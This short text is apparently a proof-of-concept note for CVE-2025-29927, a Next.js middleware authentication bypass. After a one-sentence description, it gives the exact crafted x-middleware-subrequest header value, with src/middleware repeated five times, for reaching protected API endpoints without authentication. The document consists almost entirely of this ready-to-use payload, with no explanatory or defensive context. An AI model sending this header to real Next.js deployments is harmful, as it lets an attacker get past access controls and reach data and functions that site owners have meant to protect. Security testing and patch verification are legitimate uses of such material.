
Proof-of-concept for CVE-2025-29927 that bypasses Next.js middleware authentication by sending a crafted x-middleware-subrequest header to protected API endpoints.
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware as header